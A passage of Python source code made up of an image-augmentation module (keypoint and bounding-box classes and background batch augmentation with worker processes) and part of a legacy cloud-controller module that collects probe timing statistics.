Keypoint object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = (self.x / from_width) * to_width
y = (self.y / from_height) * to_height
return Keypoint(x=x, y=y)
def shift(self, x, y):
"""
Move the keypoint around on an image.
Parameters
----------
x : number
Move by this value on the x axis.
y : number
Move by this value on the y axis.
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
"""
Object that represents all keypoints on a single image.
Parameters
----------
keypoints : list of Keypoint
List of keypoints on the image.
shape : tuple of int
The shape of the image on which the keypoints are placed.
Examples
--------
>>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
>>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
"""
def __init__(self, keypoints, shape):
#assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project keypoints from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the keypoints are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : KeypointsOnImage
Object containing all projected keypoints.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw all keypoints onto a given image. Each keypoint is marked by a
square of a chosen color and size.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the keypoints.
This image should usually have the same shape as
set in KeypointsOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all keypoints. If a single int `C`, then that is
equivalent to (C,C,C).
size : int, optional(default=3)
The size of each point. If set to C, each square will have
size CxC.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any keypoint is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn keypoints.
"""
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y_int, keypoint.x_int
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width - 1)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height - 1)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x, y):
"""
Move the keypoints around on an image.
Parameters
----------
x : number
Move each keypoint by this value on the x axis.
y : number
Move each keypoint by this value on the y axis.
Returns
-------
out : KeypointsOnImage
Keypoints after moving them.
"""
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
"""
Convert the coordinates of all keypoints in this object to
an array of shape (N,2).
Returns
-------
result : (N, 2) ndarray
Where N is the number of keypoints. Each first value is the
x coordinate, each second value is the y coordinate.
"""
result = np.zeros((len(self.keypoints), 2), np.float32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
"""
Convert an array (N,2) with a given image shape to a KeypointsOnImage
object.
Parameters
----------
coords : (N, 2) ndarray
Coordinates of N keypoints on the original image.
Each first entry (i, 0) is expected to be the x coordinate.
Each second entry (i, 1) is expected to be the y coordinate.
shape : tuple
Shape tuple of the image on which the keypoints are placed.
Returns
-------
out : KeypointsOnImage
KeypointsOnImage object that contains all keypoints from the array.
"""
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self, size=1):
"""
Draws a new black image of shape (H,W,N) in which all keypoint coordinates
are set to 255.
(H=shape height, W=shape width, N=number of keypoints)
This function can be used as a helper when augmenting keypoints with
a method that only supports the augmentation of images.
Parameters
        ----------
size : int
Size of each (squared) point.
Returns
-------
image : (H,W,N) ndarray
Image in which the keypoints are marked. H is the height,
defined in KeypointsOnImage.shape[0] (analogous W). N is the
number of keypoints.
"""
do_assert(len(self.keypoints) > 0)
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
do_assert(size % 2 != 0)
sizeh = max(0, (size-1)//2)
for i, keypoint in enumerate(self.keypoints):
# TODO for float values spread activation over several cells
# here and do voting at the end
y = keypoint.y_int
x = keypoint.x_int
x1 = np.clip(x - sizeh, 0, width-1)
x2 = np.clip(x + sizeh + 1, 0, width-1)
y1 = np.clip(y - sizeh, 0, height-1)
y2 = np.clip(y + sizeh + 1, 0, height-1)
#if 0 <= y < height and 0 <= x < width:
# image[y, x, i] = 255
if x1 < x2 and y1 < y2:
image[y1:y2, x1:x2, i] = 128
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Converts an image generated by `to_keypoint_image()` back to
an KeypointsOnImage object.
Parameters
----------
image : (H,W,N) ndarray
            The keypoints image. N is the number of keypoints.
if_not_found_coords : tuple or list or dict or None
Coordinates to use for keypoints that cannot be found in `image`.
If this is a list/tuple, it must have two integer values. If it
is a dictionary, it must have the keys "x" and "y". If this
is None, then the keypoint will not be added to the final
KeypointsOnImage object.
threshold : int
The search for keypoints works by searching for the argmax in
            each channel. This parameter contains the minimum value that
the max must have in order to be viewed as a keypoint.
nb_channels : None or int
Number of channels of the image on which the keypoints are placed.
Some keypoint augmenters require that information.
If set to None, the keypoint's shape will be set
to `(height, width)`, otherwise `(height, width, nb_channels)`.
Returns
-------
out : KeypointsOnImage
The extracted keypoints.
"""
do_assert(len(image.shape) == 3)
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
do_assert(len(if_not_found_coords) == 2)
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
out_shape = (height, width)
if nb_channels is not None:
out_shape += (nb_channels,)
return KeypointsOnImage(keypoints, shape=out_shape)
def copy(self):
"""
Create a shallow copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
def __init__(self, x1, y1, x2, y2):
if x1 > x2:
x2, x1 = x1, x2
do_assert(x2 > x1)
if y1 > y2:
y2, y1 = y1, y2
do_assert(y2 > y1)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
@property
def x1_int(self):
return int(round(self.x1))
@property
def y1_int(self):
return int(round(self.y1))
@property
def x2_int(self):
return int(round(self.x2))
@property
def y2_int(self):
return int(round(self.y2))
@property
def height(self):
return self.y2 - self.y1
@property
def width(self):
return self.x2 - self.x1
@property
def center_x(self):
return self.x1 + self.width/2
@property
def center_y(self):
return self.y1 + self.height/2
@property
def area(self):
return self.height * self.width
def project(self, from_shape, to_shape):
"""
Project the bounding box onto a new position on a new image.
E.g. if the bounding box is on its original image at
x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
a new image with size (width=200, height=200), its new position will
be (x1=20, y1=40). (Analogous for x2/y2.)
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : BoundingBox
BoundingBox object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return self.copy()
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
do_assert(from_height > 0)
do_assert(from_width > 0)
do_assert(to_height > 0)
do_assert(to_width > 0)
x1 = (self.x1 / from_width) * to_width
y1 = (self.y1 / from_height) * to_height
x2 = (self.x2 / from_width) * to_width
y2 = (self.y2 / from_height) * to_height
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
return BoundingBox(
x1=self.x1 - all_sides - left,
x2=self.x2 + all_sides + right,
y1=self.y1 - all_sides - top,
y2=self.y2 + all_sides + bottom
)
def intersection(self, other, default=None):
x1_i = max(self.x1, other.x1)
y1_i = max(self.y1, other.y1)
x2_i = min(self.x2, other.x2)
y2_i = min(self.y2, other.y2)
if x1_i >= x2_i or y1_i >= y2_i:
return default
else:
return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
def union(self, other):
return BoundingBox(
x1=min(self.x1, other.x1),
y1=min(self.y1, other.y1),
x2=max(self.x2, other.x2),
y2=max(self.y2, other.y2)
)
    def iou(self, other):
        inters = self.intersection(other)
        if inters is None:
            return 0
        else:
            # intersection over union: divide by the combined area of both
            # boxes, not by the area of the enclosing box returned by union()
            area_union = self.area + other.area - inters.area
            return inters.area / area_union if area_union > 0 else 0
def is_fully_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
def is_partly_within_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
return self.intersection(img_bb) is not None
def is_out_of_image(self, image, fully=True, partly=False):
if self.is_fully_within_image(image):
return False
elif self.is_partly_within_image(image):
return partly
else:
return fully
def cut_out_of_image(self, image):
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
do_assert(height > 0)
do_assert(width > 0)
x1 = np.clip(self.x1, 0, width)
x2 = np.clip(self.x2, 0, width)
y1 = np.clip(self.y1, 0, height)
y2 = np.clip(self.y2, 0, height)
if x1 == x2:
if x1 == 0:
x2 += 1
else:
x1 -= 1
if y1 == y2:
if y1 == 0:
y2 += 1
else:
y1 -= 1
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2
)
def shift(self, top=None, right=None, bottom=None, left=None):
top = top if top is not None else 0
right = right if right is not None else 0
bottom = bottom if bottom is not None else 0
left = left if left is not None else 0
return self.copy(
x1=self.x1+left-right,
x2=self.x2+left-right,
y1=self.y1+top-bottom,
y2=self.y2+top-bottom
)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
if raise_if_out_of_image and self.is_out_of_image(image):
raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
result = np.copy(image) if copy else image
for i in range(thickness):
y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
rr, cc = draw.polygon_perimeter(y, x, shape=result.shape)
if alpha >= 0.99:
result[rr, cc, 0] = color[0]
result[rr, cc, 1] = color[1]
result[rr, cc, 2] = color[2]
else:
if result.dtype in [np.float32, np.float64]:
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255)
else:
input_dtype = result.dtype
result = result.astype(np.float32)
result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
result = np.clip(result, 0, 255).astype(input_dtype)
return result
def extract_from_image(self, image):
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
height, width = image.shape[0], image.shape[1]
x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
# if the bb is outside of the image area, the following pads the image
# first with black pixels until the bb is inside the image
# and only then extracts the image area
# TODO probably more efficient to initialize an array of zeros
# and copy only the portions of the bb into that array that are
# natively inside the image area
if x1 < 0:
pad_left = abs(x1)
x2 = x2 + abs(x1)
x1 = 0
if y1 < 0:
pad_top = abs(y1)
y2 = y2 + abs(y1)
y1 = 0
if x2 >= width:
pad_right = x2 - (width - 1)
if y2 >= height:
pad_bottom = y2 - (height - 1)
if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
if len(image.shape) == 2:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
else:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
return image[y1:y2, x1:x2]
def to_keypoints(self):
return [
Keypoint(x=self.x1, y=self.y1),
Keypoint(x=self.x2, y=self.y1),
Keypoint(x=self.x2, y=self.y2),
Keypoint(x=self.x1, y=self.y2)
]
def copy(self, x1=None, y1=None, x2=None, y2=None):
return BoundingBox(
x1=self.x1 if x1 is None else x1,
x2=self.x2 if x2 is None else x2,
y1=self.y1 if y1 is None else y1,
y2=self.y2 if y2 is None else y2
)
def deepcopy(self, x1=None, y1=None, x2=None, y2=None):
return self.copy(x1=x1, y1=y1, x2=x2, y2=y2)
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBox(x1=%.4f, y1=%.4f, x2=%.4f, y2=%.4f)" % (self.x1, self.y1, self.x2, self.y2)
class BoundingBoxesOnImage(object):
"""
Object that represents all bounding boxes on a single image.
Parameters
----------
bounding_boxes : list of BoundingBox
List of bounding boxes on the image.
shape : tuple of int
The shape of the image on which the bounding boxes are placed.
Examples
--------
>>> bbs = [
>>> BoundingBox(x1=10, y1=20, x2=20, y2=30),
>>> BoundingBox(x1=25, y1=50, x2=30, y2=70)
>>> ]
>>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
"""
def __init__(self, bounding_boxes, shape):
self.bounding_boxes = bounding_boxes
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
"""
Project bounding boxes from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the bounding boxes are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
        bounding_boxes : BoundingBoxesOnImage
Object containing all projected bounding boxes.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bounding_boxes, shape)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
"""
Draw all bounding boxes onto a given image.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the bounding boxes.
This image should usually have the same shape as
set in BoundingBoxesOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all bounding boxes. If a single int `C`, then that is
equivalent to (C,C,C).
        alpha : float, optional(default=1.0)
Alpha/transparency of the bounding box.
thickness : int, optional(default=1)
Thickness in pixels.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any bounding box is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn bounding boxes.
"""
for bb in self.bounding_boxes:
image = bb.draw_on_image(
image,
color=color,
alpha=alpha,
thickness=thickness,
copy=copy,
raise_if_out_of_image=raise_if_out_of_image
)
return image
def remove_out_of_image(self, fully=True, partly=False):
bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
def cut_out_of_image(self):
bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
def shift(self, top=None, right=None, bottom=None, left=None):
bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs_new, shape=self.shape)
def copy(self):
"""
Create a shallow copy of the BoundingBoxesOnImage object.
Returns
-------
out : BoundingBoxesOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the BoundingBoxesOnImage object.
Returns
-------
        out : BoundingBoxesOnImage
Deep copy.
"""
# Manual copy is far faster than deepcopy for KeypointsOnImage,
# so use manual copy here too
bbs = [bb.deepcopy() for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBoxesOnImage(%s, shape=%s)" % (str(self.bounding_boxes), self.shape)
############################
# Background augmentation
############################
class Batch(object):
"""
Class encapsulating a batch before and after augmentation.
Parameters
----------
images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
        The images to augment.
    keypoints : None or list of KeypointsOnImage
        The keypoints to augment.
data : anything
Additional data that is saved in the batch and may be read out
after augmentation. This could e.g. contain filepaths to each image
in `images`. As this object is usually used for background
augmentation with multiple processes, the augmented Batch objects might
not be returned in the original order, making this information useful.
"""
def __init__(self, images=None, keypoints=None, data=None):
self.images = images
self.images_aug = None
self.keypoints = keypoints
self.keypoints_aug = None
self.data = data
class BatchLoader(object):
"""
Class to load batches in the background.
    Loaded batches can be accessed using `BatchLoader.queue`.
Parameters
----------
load_batch_func : callable
Function that yields Batch objects (i.e. expected to be a generator).
Background loading automatically stops when the last batch was yielded.
queue_size : int, optional(default=50)
Maximum number of batches to store in the queue. May be set higher
for small images and/or small batches.
nb_workers : int, optional(default=1)
Number of workers to run in the background.
threaded : bool, optional(default=True)
Whether to run the background processes using threads (true) or
full processes (false).
"""
def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
do_assert(queue_size > 0)
do_assert(nb_workers >= 1)
self.queue = multiprocessing.Queue(queue_size)
self.join_signal = multiprocessing.Event()
self.finished_signals = []
self.workers = []
self.threaded = threaded
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
finished_signal = multiprocessing.Event()
self.finished_signals.append(finished_signal)
if threaded:
worker = threading.Thread(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, None))
else:
worker = multiprocessing.Process(target=self._load_batches, args=(load_batch_func, self.queue, finished_signal, self.join_signal, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def all_finished(self):
"""
Determine whether the workers have finished the loading process.
Returns
-------
out : bool
True if all workers have finished. Else False.
"""
return all([event.is_set() for event in self.finished_signals])
def _load_batches(self, load_batch_func, queue, finished_signal, join_signal, seedval):
if seedval is not None:
random.seed(seedval)
np.random.seed(seedval)
seed(seedval)
for batch in load_batch_func():
do_assert(isinstance(batch, Batch), "Expected batch returned by lambda function to be of class imgaug.Batch, got %s." % (type(batch),))
queue.put(pickle.dumps(batch, protocol=-1))
if join_signal.is_set():
break
finished_signal.set()
def terminate(self):
"""
Stop all workers.
"""
self.join_signal.set()
if self.threaded:
for worker in self.workers:
worker.join()
else:
for worker, finished_signal in zip(self.workers, self.finished_signals):
worker.terminate()
finished_signal.set()
self.queue.close()
class BackgroundAugmenter(object):
"""
Class to augment batches in the background (while training on the GPU).
This is a wrapper around the multiprocessing module.
Parameters
----------
    batch_loader : BatchLoader
        BatchLoader object to load data in the background.
augseq : Augmenter
An augmenter to apply to all loaded images.
This may be e.g. a Sequential to apply multiple augmenters.
queue_size : int
Size of the queue that is used to temporarily save the augmentation
results. Larger values offer the background processes more room
to save results when the main process doesn't load much, i.e. they
can lead to smoother and faster training. For large images, high
values can block a lot of RAM though.
nb_workers : "auto" or int
Number of background workers to spawn. If auto, it will be set
to C-1, where C is the number of CPU cores.
"""
def __init__(self, batch_loader, augseq, queue_size=50, nb_workers="auto"):
do_assert(queue_size > 0)
self.augseq = augseq
self.source_finished_signals = batch_loader.finished_signals
self.queue_source = batch_loader.queue
self.queue_result = multiprocessing.Queue(queue_size)
if nb_workers == "auto":
try:
nb_workers = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
nb_workers = 1
# try to reserve at least one core for the main process
nb_workers = max(1, nb_workers - 1)
else:
do_assert(nb_workers >= 1)
#print("Starting %d background processes" % (nb_workers,))
self.nb_workers = nb_workers
self.workers = []
self.nb_workers_finished = 0
self.augment_images = True
self.augment_keypoints = True
seeds = current_random_state().randint(0, 10**6, size=(nb_workers,))
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment_images_worker, args=(augseq, self.queue_source, self.queue_result, self.source_finished_signals, seeds[i]))
worker.daemon = True
worker.start()
self.workers.append(worker)
def get_batch(self):
"""
Returns a batch from the queue of augmented batches.
If workers are still running and there are no batches in the queue,
it will automatically wait for the next batch.
Returns
-------
out : None or ia.Batch
One batch or None if all workers have finished.
"""
batch_str = self.queue_result.get()
batch = pickle.loads(batch_str)
if batch is not None:
return batch
else:
self.nb_workers_finished += 1
if self.nb_workers_finished == self.nb_workers:
return None
else:
return self.get_batch()
def _augment_images_worker(self, augseq, queue_source, queue_result, source_finished_signals, seedval):
"""
Worker function that endlessly queries the source queue (input
batches), augments batches in it and sends the result to the output
queue.
"""
np.random.seed(seedval)
random.seed(seedval)
augseq.reseed(seedval)
seed(seedval)
while True:
# wait for a new batch in the source queue and load it
try:
batch_str = queue_source.get(timeout=0.1)
batch = pickle.loads(batch_str)
# augment the batch
batch_augment_images = batch.images is not None and self.augment_images
batch_augment_keypoints = batch.keypoints is not None and self.augment_keypoints
if batch_augment_images and batch_augment_keypoints:
augseq_det = augseq.to_deterministic() if not augseq.deterministic else augseq
batch.images_aug = augseq_det.augment_images(batch.images)
batch.keypoints_aug = augseq_det.augment_keypoints(batch.keypoints)
elif batch_augment_images:
batch.images_aug = augseq.augment_images(batch.images)
elif batch_augment_keypoints:
batch.keypoints_aug = augseq.augment_keypoints(batch.keypoints)
# send augmented batch to output queue
batch_str = pickle.dumps(batch, protocol=-1)
queue_result.put(batch_str)
except QueueEmpty:
if all([signal.is_set() for signal in source_finished_signals]):
queue_result.put(pickle.dumps(None, protocol=-1))
return
def terminate(self):
"""
Terminates all background processes immediately.
This will also free their RAM.
"""
for worker in self.workers:
worker.terminate()
self.queue_result.close()
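# Illustrative sketch (not part of the original module): typical usage of
# BatchLoader together with BackgroundAugmenter. `augseq` is assumed to be any
# Augmenter instance and `load_batches` a generator yielding Batch objects;
# both names are hypothetical.
def _example_background_augmentation(augseq, load_batches):
    batch_loader = BatchLoader(load_batches, queue_size=20, nb_workers=1)
    bg_augmenter = BackgroundAugmenter(batch_loader, augseq, queue_size=20, nb_workers="auto")
    while True:
        batch = bg_augmenter.get_batch()
        if batch is None:  # all workers have finished
            break
        images_aug = batch.images_aug  # train on the augmented images here
    batch_loader.terminate()
    bg_augmenter.terminate()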
|
probe_controller.py
|
"""
The old module responsible for measurement data collection. It is currently not used,
as it was superseded by IVIS. It may be plugged back in in the future.
"""
import time
from functools import reduce
from multiprocessing.pool import ThreadPool, ApplyResult
from typing import List, Tuple, Dict, Optional
import threading
import logging
from cloud_controller.knowledge.knowledge import Knowledge
from cloud_controller.knowledge.model import TimeContract
from cloud_controller.knowledge.instance import ManagedCompin
from cloud_controller.middleware import AGENT_PORT, middleware_pb2
from cloud_controller.middleware.helpers import connect_to_grpc_server
from cloud_controller.middleware.middleware_pb2_grpc import MiddlewareAgentStub
class RuntimeMeasurementScenario:
def __init__(self):
self.workloads: List[Tuple[ManagedCompin, str, int]] = []
class ScenarioFactory:
def add_compin(self, compin: ManagedCompin) -> None:
pass
def remove_compin(self, compin: ManagedCompin) -> None:
pass
def next_scenario(self) -> RuntimeMeasurementScenario:
pass
class SingleNodeScenarioFactory(ScenarioFactory):
# TODO: as of now it assumes one probe per component. Fix this!
def __init__(self):
self.current_node: str = ""
self.compins_by_node: Dict[str, List[ManagedCompin]] = {}
self.nodes: List[str] = []
self.current_node_index: int = 0
self.DEFAULT_ITERATION_COUNT = 10
def add_compin(self, compin: ManagedCompin) -> None:
assert len(compin.component.probes) == 1
if compin.node_name not in self.compins_by_node:
self.compins_by_node[compin.node_name] = []
self.nodes.append(compin.node_name)
self.compins_by_node[compin.node_name].append(compin)
def remove_compin(self, compin: ManagedCompin) -> None:
assert compin.node_name in self.compins_by_node
assert compin in self.compins_by_node[compin.node_name]
self.compins_by_node[compin.node_name].remove(compin)
if len(self.compins_by_node[compin.node_name]) == 0:
del self.compins_by_node[compin.node_name]
self.nodes.remove(compin.node_name)
def next_scenario(self) -> Optional[RuntimeMeasurementScenario]:
if len(self.nodes) == 0:
return None
if self.current_node_index >= len(self.nodes):
self.current_node_index = 0
scenario = RuntimeMeasurementScenario()
for compin in self.compins_by_node[self.nodes[self.current_node_index]]:
probe_name = compin.component.probes[0].name
scenario.workloads.append((compin, probe_name, self.DEFAULT_ITERATION_COUNT))
self.current_node_index += 1
return scenario
class StatisticsCollector:
# TODO: as of now it assumes one probe per component. Fix this!
# TODO: improve performance of statistics calculation
def __init__(self):
self.compin_data: Dict[str, List[float]] = {}
self.component_data: Dict[Tuple[str, str], List[float]] = {}
self.time_limits: Dict[Tuple[str, str], float] = {}
self.compin_time_limits: Dict[str, float] = {}
def process_data(self, compin: ManagedCompin, data: List[str]):
component_id = (compin.component.application.name, compin.component.name)
if compin.id not in self.compin_data:
self.compin_data[compin.id] = []
assert len(compin.component.probes) == 1
assert len(compin.component.probes[0].requirements) == 1
requirement = compin.component.probes[0].requirements[0]
assert isinstance(requirement, TimeContract)
self.compin_time_limits[compin.id] = requirement.time
if component_id not in self.component_data:
self.component_data[component_id] = []
assert len(compin.component.probes) == 1
assert len(compin.component.probes[0].requirements) == 1
requirement = compin.component.probes[0].requirements[0]
assert isinstance(requirement, TimeContract)
self.time_limits[component_id] = requirement.time
for line in data:
items = line.split(';')
assert len(items) >= 5
execution_time = float(items[4])
self.compin_data[compin.id].append(execution_time)
self.component_data[component_id].append(execution_time)
def get_compin_stats(self) -> List[Tuple[str, float]]:
stats = []
for compin_id, data in self.compin_data.items():
time_limit = self.compin_time_limits[compin_id]
success_count = reduce((lambda x, y: x + 1 if y < time_limit else x), [0] + data)
success_percentage = success_count / len(data)
stats.append((compin_id, success_percentage))
return stats
def get_component_stats(self) -> List[Tuple[Tuple[str, str], float]]:
stats = []
for component_id, data in self.component_data.items():
time_limit = self.time_limits[component_id]
success_count = reduce((lambda x, y: x + 1 if y < time_limit else x), [0] + data)
success_percentage = success_count / len(data)
stats.append((component_id, success_percentage))
return stats
def get_global_stats(self) -> float:
total_count = reduce((lambda x, y: x + len(y)), [0] + list(self.compin_data.values()))
compin_stats = self.get_compin_stats()
total_successes = reduce((lambda x, y: x + y[1] * len(self.compin_data[y[0]])), [0] + compin_stats)
return total_successes / total_count
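# Illustrative sketch (not part of this module): the success-percentage logic used
# by StatisticsCollector above, shown on plain numbers. A measurement counts as a
# success when its execution time stays below the time limit.
def _example_success_percentage(execution_times=(0.8, 1.2, 0.9), time_limit=1.0):
    successes = reduce((lambda x, y: x + 1 if y < time_limit else x), [0] + list(execution_times))
    return successes / len(execution_times)  # 2/3 for the default values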
class ProbeController:
def __init__(self, knowledge: Knowledge):
self._knowledge = knowledge
self._pool: ThreadPool = None
self._factory: ScenarioFactory = SingleNodeScenarioFactory()
self._compin_threads: Dict[str, Tuple[ManagedCompin, ApplyResult]] = {}
self.statistics_collector = StatisticsCollector()
